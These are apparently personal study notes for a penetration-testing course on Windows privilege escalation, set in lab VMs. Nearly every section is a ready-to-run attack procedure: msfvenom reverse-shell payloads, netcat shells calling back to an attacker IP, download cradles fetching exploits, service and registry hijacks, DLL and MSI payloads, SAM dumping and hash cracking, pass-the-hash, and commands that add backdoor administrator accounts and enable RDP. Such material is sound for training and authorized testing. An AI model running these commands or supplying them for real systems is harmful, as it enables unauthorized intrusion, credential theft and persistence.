3 PrivEsc

Priority

Kernel and privesc links

LOLBas

Living off the Lands binary (Windows) - Like GTFOBins
https://lolbas-project.github.io/
https://github.com/SecWiki/windows-kernel-exploits/

General:

Goals: Get shell as 'Administrator' or 'System'
All PrivEsc are actually access-control-violations
AC and User Perms are intrinsically linked
Think of how Windows handles perms
PayloadAllTheThings-Windows - Privilege Escalation
nickvourd-Oscp-Methods-WindowsPrivEsc

Strategy:

Dont chase your first finding
Look over the enumeration
Make notes from winPEAS
Avoid Rabbit holes
Exploitable service that can be edited ..but cant be stop/started.. isnt very good for us
Take a look around for interesting files
- C:\
- C:\Program Files
Look for easy-steps first:
- Registry Exploits
- Services
- Admin Processes
- Get versions and search exploit
No admin?
- Dont panic. Keep practicing.
- Go back through yours enum results

PrivEsc Class

Windows PrivEsc Udemy
PrivEsc workshop VM ...Plus: MisConfigs
Login: IEUser:Passw0rd!
password123 (admin)

Perms

User Accounts
- Logon rights
- files/folders/desktop/etc
Service Accounts
- SYSTEM is highest priv of any local acct
- Cant login with these
- Also: network service, local service
Perms are controlled by ACL
- Access Control List
- user/group/svc/registry/etc

Misconfigs

Insecure Service Properties
Unquoted Service Path
Weak Registry Permissions
Insecure Service Executables
DLL Hijacking

Best Practices:

Use 'allowed commands' (ie: whitelist) instead of 'disallowed'
Use a pager like 'most' instead of less/more
Avoid allowing programming languages
or harden, pty(), system(), exec()

smbserver.py

Send files between Linux and Windows
REF: MovingFiles

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 ./smbserver.py share /tmp

Unquoted Paths

C:\Program Files\OpenVPN\openvpn.exe    ..bad
"C:\Program Files\VMWare\vmtoolsd.exe"  ..good
C:\Program.exe  ..Could run with elevated!!

Passwords: Unattended Install Files

Unattend.xml

C:\Windows\System32\
C:\Windows\System32\sysprep\
C:\Windows\Panther\
C:\Windows\Panther\Unattend\

Found:
<LocalAccount>
<Value> U0VDNTk5IFJPQKET== <Value>  ..base64 !!!

echo U0VDNTk5IFJPQKET== | base64 -d
Flag!!

Passwords: Group Policy Prefs (GPP)

We used to set the 'default' admin password
Old and patched but still has traces

> findstr /S cpassword %LOGONSERVER%\sysvol\*.xml

Metasploit:

MSF > GPP module to pull/extract/decrypt

Domain:

Map the Domain controller SYSVOL share
> net use z: \\dc01\SYSVOL

Find the GPP file: Groups.xml
> cd z:
> dir /s Groups.xml

Review the contents for passwords
> type Groups.xml

gpp-decrypt

gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB

Enable SMB v1

Just to prep your Lab:
v1 is a really bad idea.. EternalBlue exploitable!

Powershell as Admin:

PS> Enable-WindowsOptionalFeature -Online -featureName "SMB1Protocol-Client" -All
or
PS> Get-WindowsOptionalFeature -Online -featureName "SMB1Protocol"
PS> Enable-WindowsOptionalFeature -Online -featureName "SMB1Protocol-Client" -All

Yes, reboot or
PS> optionalfeatures.exe
.. SMB 1.0
.. SMB Direct
Ok

Basic Venom Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f exe -o reverse.exe
nc -nvlp 53

c:\PrivEsc> copy \192.x.kali\tools\reverse.exe . 
c:\PrivEsc> .\reverse.exe

RDP Trick

> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy

psexec

Escalate from admin to SYSTEM https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

From Kali: Make Windows connect-back

> PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe
> PSExec64.exe -accepteula -i -u "nt authority\local service" reverse.exe
> psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 10.x.x.x 4444 -e cmd.exe"

Kernel Exploits from Sysinfo

Method: systeminfo > wes > cve > shell

cd C:\Temp
systeminfo > sys.txt
C:> systeminfo > \\192.x.x.x\share\sys.txt
curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

Look up results:
- https://github.com/SecWiki/windows-kernel-exploits
- CVE or MS found: CVE-2018-8120
- Including compiled binary: x64.exe x86.exe
PrivEsc:
- Kali: listener: nc -nvlp 53
- Windows: Run the exploit, and the program to execute (ie: rev shell)
- c:\PrivEsc\cve-2018-8120-x64.exe C:\PrivEsc\reverse.exe
- Kali - Connected!!

Services

We can exploit.. If they are running with SYSTEM privs and are misconfigured

sc.exe qc myserv                  ..query config
sc.exe query myserv               ..query status
sc.exe config myserv option=xyz   ..modify
net start/stop myserv             ..start/stop

Service: Modify

You could repoint the executable to our Reverse-Shell Must be able to stop/start the service to apply Maybe force a reboot, if you have to

---------------------------
Service Issues:
./winPEASany.exe quiet servicesinfo 
cat winpeas-services.txt

Found: 
daclsvc - "you can modify this service"

Verify: 
accesschk.exe /accepteula -uwcqv user daclsvc 
Found: SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP

sc qc daclsvc      ..svc path & detail 
sc query daclsvc   ..currently stopped

---------------------------
Exploit:
Change binpath to our reverse-shell 
sc config daclsvc binpath="\"C:\PrivEsc\reverse.exe\""

kali: nc -nvlp 53
net start daclsvc
whoami system!!

Service: Unquoted Path

Unquoted paths can give ambiguity
whoami.exe ..same as: whoami
Example:
- C:\Program Files\Some Dir\SomeProgram.exe
Could be:
- "C:\Program" with "Files\Some" as argument
Windows will do a check to test options when run.

---------------------------
winPEAS 
Found: Unquotedsvc 
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Verify we can edit: 
accesschk.exe /accepteula -uwcqv user unquotedsvc 
Found: SERVICE_START, SERVICE_STOP

Can we edit the Binary?
accesschk.exe /accepteula -uwcqv C: 
accesschk.exe /accepteula -uwcqv "C:\Program Files\" 
accesschk.exe /accepteula -uwcqv "C:\Program Files\Unquoted Path Service\"

Found! 
BUILTIN\Users  ..allowed RW 
C:\Program Files\Unquoted Path Service\

---------------------------
Exploit: 
C:\Program Files\Unquoted Path Service\Common.exe 
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

kali listener: nc -nvlp 53
net start unquotedsvc
whoami system!!

Service: Exec Swap

If "myservice.exe" is modifiable, we can just replace it!
Be sure to make a backup, in prod

---------------------------
winPEAS 
filepermsvc .."File Permissions: Everyone [AllAccess]"

Verify:
.\accesschk.exe /accepteula -uvwqk "C:\Program Files\File Permissions Service\filepermservice.exe"
.\accesschk.exe /accepteula -uvqc filepermsvc

Found:
Can read/write
Can start/stop

Backup 
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp

---------------------------
Exploit:
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

kali listener: nc -nvlp 53
net start filepermsvc
whoami system!!

Registry: Weak Perms

Registry keeps detail for each service.
ACL is bad = we can edit the registry.
Even if the service cant be modified.
We can update the registry of a service that has 'system' and point to our reverse

---------------------------
winPEAS
Found 'regsvc' can be modified in registry

Verify:
powershell -exec bypass
ps> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
ps> .\accesschk.exe /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc

Confirmed:
RW - NT Authority\INTERACTIVE ..meaning us!

Can we start the service? 
ps> .\accesschk.exe /accepteula -ucqv user regsvc 
SERVICE_START, SERVICE_STOP ..yes!

---------------------------
Plan:
Repoint the Registry to our 'reverse':
reg query HKLM:\System\CurrentControlSet\Services\regsvc
.. ImagePath says: C:\Program Files... insecureregistryservice.exe
.. ObjectName: LocalSystem ..SYSTEM privs

---------------------------
Exploit:
reg add HKLM:\System\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

kali listener: nc -nvlp 53
net start regsvc
whoami system!!

Registry: AutoRuns

Could be useful, but difficult Since it would require a reboot

winPEASany.exe quiet appliationinfo

Autorun Applications ..Found! C:\Program Files Autorun Program\program.exe FilePerms: Everyone ..yikes

Manually check for AutoRuns: reg query HKLM\SOFWARE\Microsoft\Windows\CurrentVersion\Run found!

Verify, can we write to it?

accesschk.exe /accepteula -wvu "C:\Program Files Autorun Program\program.exe" RW Everyone ALL_ACCESS

Backup the .exe copy "C:\Program Files Autorun Program\program.exe" C:\Temp

Overwrite the .exe copy /Y reverse.exe "C:\Program Files Autorun Program\program.exe" kali listener: nc -nvlp 53 On a restart, Windows will auto-run as the 'last-user' So, lets get admin prepped and reboot: windows: login as admin windows: restart whoami admin!

DLL Missing Hijack

If a Service loads a DLL
The DLL will get same permission as executed
If DLL is missing, and we can write to that dir...
Then we can add our evil-dll in that location!
Often a very MANUAL process to discover this exploit
In a real engagement: we would copy the .exe and analyze it in another environment
REF: DLLHijackWithMSF

---------------------------
winPEAS 
Check for DLL Hijacking in PATH folders 
"C:\Temp" ..found writable and Path!
"dllsvc"  ..vulnerable to hijacking

Verify: 
.\accesschk.exe /accepteula -uvqc dllsvc 
Found: Can start/stop

sc qc dllsvc 
binary: "C:\Program Files\DLL Hijack Service\dllhijackservice.exe" 
runs as LocalSystm

---------------------------
Procmon DLL Watch

Windows: 
Procmon64 (run as Admin)
Clear, Ctrl-L ..add filter Process "dllhijackservice.exe" 
De-select registry 
De-select show-network 
Start Capture 
cmd> net start dllsvc 
lots of 'NAME NOT FOUND' 
Also tries: "C:\Temp\hijackme.dll" ..which is writeable!

---------------------------
Exploit:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f dll -o /tools/hijackme.dll
nc -nvlp 53
copy \\192.x.kali\tools\hijackme.dll C:\Temp
net stop dllsvc
net start dllsvc
whoami
system!!

MSI: Install Elevated

AlwaysInstallElevated Windows will allow installers to run w/elevated
Lets make a malicious MSI file that contains reverse-shell
Catch: Only works if 2 registry values are set:
- HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
- HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

---------------------------
winPEASany.exe quiet windowscreds
Found: 
AlwaysInstallElevated set to 1 in HKLM 
AlwaysInstallElevated set to 1 in HKCU

Verify:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
.. AlwaysInstallElevated = 1
.. Found!

---------------------------
Exploit: msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=53 -f msi -o /tools/reverse.msi
Catch with netcat or msf/multi
nc -nvlp 53
copy & Execute:
> copy \\192.x.kali\tools\reverse.msi C:\Temp
> msiexec /quiet/qn /i reverse.msi
whoami
system!!

Passwords: Registry

Reused, Readable, or Insecure
Registry: Apps or Windows may store plaintext

Search Registry
For passwords but too many results
> reg query HKLM /f password /t REG_SZ /s
> reg query HKCU /f password /t REG_SZ /s

Enum:
> winPEASany.exe quiet filesinfo userinfo
Autologon user/pass ..Found!
Putty Sessions u/pw ..Found

Verify Reg:
> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
> reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
user/pass Found!!

Kali:
> winexe -U 'admin%password123' //192.168.win cmd.exe
whoami admin!!

> winexe -U 'admin%password123' --system //192.168.win cmd.exe
whoami system!!

Passwords: stored creds: runas

Saved Creds with "runas"
You can runas 'admin'

> winPEASany.exe quiet cmd windowscreds
Stored Credentials - User: MyPc\admin ..Found

Confirm:
> cmdkey /list

Exploit:
> runas /savecred /user:admin C:\PrivEsc\reverse.exe
nc -nvlp 53
whoami
admin

Passwords: Search Configs

Unattend.xml file
To help install a pc, but passwords often left behind

---------------------------
Manual search:
recursive from current dir:
> dir /s *pass* == *.config
> findstr /si password *.xml *.ini *.txt

Try:
c:\user\home
c:\temp
c:\someapp\


---------------------------
Enumerate:
> winPEASany.exe quiet cmd searchfast filesinfo

Known files that can contain creds ..Found!
C:\Windows\Microsoft.NET\Framework...\web.config
C:\Windows\Panther\Unattend.xml

> type C:\Windows\Panther\Unattend.xml
found: user:pass (base64)

kali
echo "mybasexyz" | base64 -d

Passwords: SAM

REF: WindowsPW
SAM - holds windows password hashes
SYSTEM - encrypted hash key
Locked while Windows is running
If you can read both, then you can extract

Located: C:\Windows\System32\config

Backups: C:\Windows\Repair C:\Windows\System32\config\RegBack

winPEAS
> winPEASany.exe quiet cmd searchfast filesinfo
Found SAM and REGISTRY in:
C:\Windows\Repair

Copy back to Kali:
> copy C:\Windows\Repair\SAM \\192.x.kali\tools\
> copy C:\Windows\Repair\SYSTEM \\192.x.kali\tools\

pwdump

Crack Windows PW using SAM/SYSTEM
Get the latest pwdump

git clone https://github.com/Neohapsis/creddump7.git 
cd creddump7 

> python2 pydump.py /tools/SYSTEM /tools/SAM

crack admin 
hashcat -m 1000 --force myhashxyz123 /usr/share/wordlist/rockyou.txt password123 ..Found!

Connect from Kali:
winexe -U 'admin%password123' --system //192.168.win cmd.exe 
whoami admin

Pass the Hash

Use hash instead of the PW
winexe ..normal
pth-winexe ..passthehash

> pth-winexe -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami admin!!

> pth-winexe --system -U 'admin%myhashxyz123:secondhalf' //192.x.win cmd.exe
whoami system!!

Scheduled Tasks

If we can edit a current Scheduled Task
We can append our evil entry

---------------------------
View:
> schtasks /query /fo LIST /v
ps> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

cd C:\
cd DevTools  ..interesting folder
CleanUp.ps1  ..interesting file

type CleanUp.ps1

Note says
#Runs every minute
#Runs as System
Remove-Item C:\DevTools\*.log

---------------------------
perms:
accesschk.exe /accepteula -quv user CleanUp.ps1
File_Write

backup:
copy CleanUp.ps1 C:\Temp\

---------------------------
Exploit:
echo C:\PrivEsc\reverse.exe >> CleanUp.ps1
nc -nvlp 53
Connected
whoami
system!!

GUI Admin Apps

AKA: "Citrix Method"
Since we also use this to Citrix Escaping
If an app is setup to run as Admin
You can use it to also do other things! - Like open a CMD!

Open: 
"AdminPaint" icon

View: 
tasklist /V | findstr mspaint.exe 
mspaint.exe ..with Admin.. Running

Exploit: 
AdminPaint > File > Open > 
file://c:/windows/system32/cmd.exe 
whoami:admin

Startup Apps

If we can edit, we can add:
C:\ProgramData\Microsofot\Windows\Start Menu\Programs\StartUp
When Admin logs in - it will execute as Admin !!

Kali-reversed:
> accesschk.exe /accepteula -d "C:\ProgramData\Microsofot\Windows\Start Menu\Programs\StartUp"
Users have RW

vbscript to create a link to our reverse.exe
> type CreateShortcut.vbs  
> cscript CreateShortcut  ..creates our reverse.lnk

kali:
nc -nvlp 53

Win:
Logout of Windows
Login as Admin.. to trigger our Startup Script

Kali: Connected
whoami
admin!!

Installed Apps

> tasklist /V

Is it exploitable?
www.exploit-db.com
Filter: local, windows search: priv esc
Examples:
- KioWare Server.. based on weak privs
- IObiot .. unquoted service path
- IperiusBackup .. file permissions
Other good ones:
- Buffer Overflows

Hot Potato

Spoofing attack, with NTLM, to get SYSTEM
Like: Responder
Works : Windows 7, 8, early 10
Intercepts requests, Spoofs, runs our Payload

> potato.exe -ip 192.x         ..win-targer
-cmd "C:\PrivEsc\reverse.exe"  ..payload
-enable_httpserver true   
-enable_defender true 
-enable_spoof true 
-enable_exhausust true

> kali: nc -nvlp 53 
whoami system!

Potato

Another version of 'hot potato' ?
https://github.com/foxglovesec/Potato
Windows 7,8,10, Server 2008, Server 2012

Potato Family

Moved to PotatoFamily

PrintSpoofer

Print Spooler Exploit https://github.com/itm4n/PrintSpoofer Requires: vc_redist.x64.exe (if not present)

> PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
> whoami
local service

> whoami /priv
SeImpersonatePrivilege ..Enabled

> PrintSpoofer.exe -i -c "C:\PrivEsc\reverse.exe"
> nc -nvlp 4444
> whoami 
system

Metasploit: Looking Around

mtp > run post/windows/gather/win_privs cd\ & dir /b /s proof.txt type c:\pathto\proof.txt

getsystem

Metasploit Meterpreter - genius! Wont work on patched newer-windows-boxes Should NOT be considered for user>admin escalation method in modern systems

rapid7/metasploit-payloads
- elevate.c
- namedpipe.c
- tokendup.c

3 techniques getsystem can use Will try all 3 till success

Named Pipe Impersonation impersonates access token to get SYSTEM
Named Pip Impersonation but uses DLL to disk as SYSTEM DLL connects to named pipe limited to x86 arch
Token Duplication requires SeDebugPrivilege finds service as SYSTEM and injects DLL in Memory

churrasco

REF: Granny/Grandpa-HTB
https://technet.microsoft.com/library/security/ms09-012
Token impersonation via churrasco
To escalate privs to System - developed by Cesar Cerrudo.
Server 2003 allows Network Service and Local Service to impersonate 'System'
Patched by Microsoft in Windows 2012 (MS09-12).
On newer systems Juicy Potato works fine.
But on older systems, token impersonation is abused via the churrasco exploit.
If you have access to a box as nt authority\network service
IE: You managed to upload ASP.NET shell
You can easily elevate your privileges on the box.
You can download the exploit here and compile by yourself
or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe
It’s used by sqlninja in cases when we bruteforced sa password.

After uploading you can easily

Elevate your privileges.
Create an Admin account

------------------------
Share from Kali/smb:

locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555


------------------------
Windows:

whoami /priv    ..SeImpersonatePrivilege - Yes!
systeminfo      ..Server 2003 - Yes!

cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .

> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add <username> <password>"
> churrasco -d "net localgroup administrators <username> /add"
> churrasco -d "net localgroup "Remote Desktop Users" <username> /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x

> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

MS10-059
Found with WindowsExploitSuggester

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

Python to Exe

Windows privledge escalation exploits are often written in Python.
You can compile the using "pyinstaller.py" into an executable

> pip install pyinstaller
> wget -O exploit.py http://www.exploit-db.com/download/31853
> python pyinstaller.py --onefile exploit.py
exploit.exe

----------------------------------------
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/


----------------------------------------
> wget -O ms11-080.py http://www.exploit-db.com/exploits/18176/
> python pyinstaller.py --onefile ms11-080.py
mx11-080.exe

Powershell Exploits

You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server
Powershell Priv Escalation Tools:
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
One liner to run a powershell command from a basic (cmd.exe) shell:

MS16-032 
https://www.exploit-db.com/exploits/39719/

> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

Powershell RunAs

PowerShell can also be used to launch a process as another user.
Simple script will run a reverse shell as the specified username and password.

$username = '<username here>'
$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","10.x.x.x","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public


> powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"

useradd.exe

root@kali:~# cat useradd.c

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators bob /add");
return 0;
}

Compile:
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c

Previous2 Enums Next4 Kernel Exploits

Last updated 2 years ago

Was this helpful?